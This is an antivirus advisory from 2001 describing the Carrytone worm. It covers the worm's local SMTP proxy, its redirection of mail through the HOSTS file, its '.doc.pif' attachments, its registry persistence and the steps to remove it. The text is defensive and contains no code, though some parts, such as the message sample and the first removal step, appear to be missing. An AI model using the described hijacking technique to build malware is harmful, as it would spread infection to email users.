Carrytone is a mass-mailer that uses a new technique
to spread. The worm body is 40 kilobytes in size and it was
written in C. It works properly on Windows NT based
systems only.
For spreading it implements a simple SMTP proxy that listens on
port 25 (standard SMTP port) on the infected machine. When the
worm is started it fetches the SMTP server name from the user's
e-mail settings then it modifies the HOSTS file so that the
SMTP server's address points to the localhost where the worm
is listening. This way when the user sends an e-mail his/her
e-mail client will connect to the worm instead of the real
mail server. After receiving the connection the worm relays
all the commands and replies between the client and the real
mail server until it gets the reply to SMTP DATA command that
marks the beginning of the e-mail data. At this point it
inserts a copy of itself into the message.
The attachment name it uses is composed from the recipient's
name and a '.doc.pif' extension.
Messages look like this:
When the infected attachment is opened it copies itself to
the Windows folder as 'MMOPLIB.EXE' and adds it to the
runkeys in the registry:
2. When the registry is clean the system has to be rebooted to
make sure that the worm process is not active anymore. After
the reboot the worm can be deleted from the Windows directory;
it is called 'MMOPLIB.EXE'.
3. The hosts file has to be cleaned. The file is called
'%system_dir%\drivers\etc\hosts'. All the extra mailserver
addresses must be removed that point to the localhost (127.0.0.1).
NOTE: F-Secure Anti-Virus does not yet detect this virus. Detection
will be shipped after Christmas 2001. Then again, this virus is not
widespread at all. Merry Christmas.
[Analysis: Gergely Erdelyi; F-Secure Corp.; 21th of December, 2001]
